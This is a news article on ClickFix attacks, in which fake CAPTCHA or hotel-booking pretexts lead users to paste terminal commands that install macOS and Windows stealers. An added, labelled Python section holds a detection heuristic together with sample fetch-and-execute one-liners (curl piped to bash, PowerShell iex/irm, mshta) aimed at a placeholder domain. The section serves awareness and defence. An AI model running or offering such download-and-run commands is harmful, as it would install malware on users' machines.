New ClickFix attacks trick users into installing malware unknowingly
Security firms have observed a surge in ClickFix campaigns, owing to the lack of awareness about this technique

Nov 12, 2025
10:50 am

What's the story

ClickFix, a new method of cyber attack, is rapidly becoming a major security threat for unsuspecting users. The technique is quick and can bypass most endpoint protections, making it effective against both macOS and Windows users. Scammers use various tactics to launch ClickFix attacks, including phishing emails from hotels with pending registrations or WhatsApp messages containing malicious links.

Attack method

How ClickFix works

Once a target clicks on the malicious link, they are taken to a site that displays a CAPTCHA challenge or some other pretext requiring user confirmation. The user is then instructed to copy a string of text and enter it into their terminal window. Without the user realizing it, this action directs their PC or Mac to a server controlled by scammers, leading to malware download and installation without any indication of compromise.
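
As an added defensive example (not from the article or from any vendor), the following heuristic flags pasted one-line commands that download content and hand it straight to an interpreter, which is the pattern described above. The rule set, the function name assess_pasted_command and the sample commands on the reserved .invalid domain are constructed assumptions and are not exhaustive.

```python
import re

# Illustrative heuristics for text a web page asks a user to paste into a
# terminal or Run dialog. Rule names and patterns are assumptions, not a
# vendor rule set, and are not exhaustive.
FETCH = r"\b(?:curl|wget)\b[^|;&\n]*https?://"
INTERP = r"(?:sudo\s+)?(?:(?:ba|z|da|k)?sh|python3?|osascript)\b"
PS_GET = r"(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring)"
PS_RUN = r"(?:iex|invoke-expression)"

RULES = [
    ("download piped to interpreter",
     re.compile(rf"{FETCH}[^|\n]*\|\s*{INTERP}", re.I)),
    ("interpreter runs download output",
     re.compile(rf"\b{INTERP}\s+(?:-c\s+)?[\"']?\$\(\s*{FETCH}", re.I)),
    ("decoded blob piped to interpreter",
     re.compile(rf"\bbase64\s+(?:-d|--decode)\b[^|\n]*\|\s*{INTERP}", re.I)),
    ("PowerShell download-and-execute",
     re.compile(rf"\b{PS_RUN}\b.*\b{PS_GET}\b|\b{PS_GET}\b.*\|\s*{PS_RUN}\b", re.I)),
    ("mshta given a remote URL",
     re.compile(r"\bmshta(?:\.exe)?\s+[\"']?https?://", re.I)),
]

def assess_pasted_command(text: str) -> list[str]:
    """Return the name of every rule the pasted text trips (empty = none)."""
    # Join shell (backslash) and PowerShell (backtick) line continuations
    # so a command split across lines is matched as one line.
    joined = re.sub(r"[\\`]\r?\n\s*", " ", text)
    return [name for name, rx in RULES if rx.search(joined)]

# Constructed samples; .invalid is a reserved TLD that never resolves.
SAMPLES = [
    "curl -fsSL https://example.invalid/verify.sh | bash",
    '/bin/bash -c "$(curl -fsSL https://example.invalid/install)"',
    "echo Y29uc3RydWN0ZWQ= | base64 -d | sh",
    'powershell -w hidden -c "iex (irm https://example.invalid/a)"',
    "mshta https://example.invalid/check.hta",
    "curl -O https://example.invalid/report.pdf",   # plain download
    "brew install wget",                             # no fetch-and-run
]

if __name__ == "__main__":
    for cmd in SAMPLES:
        hits = assess_pasted_command(cmd)
        print("FLAG " if hits else "ok   ", cmd, hits)
```

A check like this fits wherever pasted or typed command lines are already visible to defenders, such as shell history or process-creation logs; a match is a prompt for review, not proof of compromise.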

Campaign prevalence

Rise in ClickFix campaigns

Security firms have observed a surge in ClickFix campaigns, owing to the lack of awareness about this technique and its ability to bypass some endpoint protections. Researchers from CrowdStrike noted that "leveraging malvertising and the one-line installation-command technique to distribute macOS information stealers remains popular among eCrime actors." They also highlighted how these tactics are used to promote fake, malicious websites, driving more traffic and potential victims to them.

Targeted platforms

Types of malware used in attacks

The primary malware used in these campaigns is a credential-stealer called 'Shamos.' Other malicious payloads include a cryptocurrency wallet, software to enlist the infected Mac in a botnet, and macOS configuration changes for persistent malware execution. Notably, one campaign targeting Windows users involved compromising a hotel's account on Booking.com or similar sites to gain immediate trust with targets, who are eager to comply with instructions for fear of having their stay canceled.

Scam awareness

Raising awareness against scams

The effectiveness of ClickFix attacks also stems from the lack of awareness among users. Most people have learned to be wary of links in emails or messengers, but this precaution doesn't always extend to sites asking them to copy and paste text into an unfamiliar window. As families come together for holiday dinners in the coming weeks, it's crucial to raise awareness about these scams as a preventive measure against potential cyber threats during this festive season.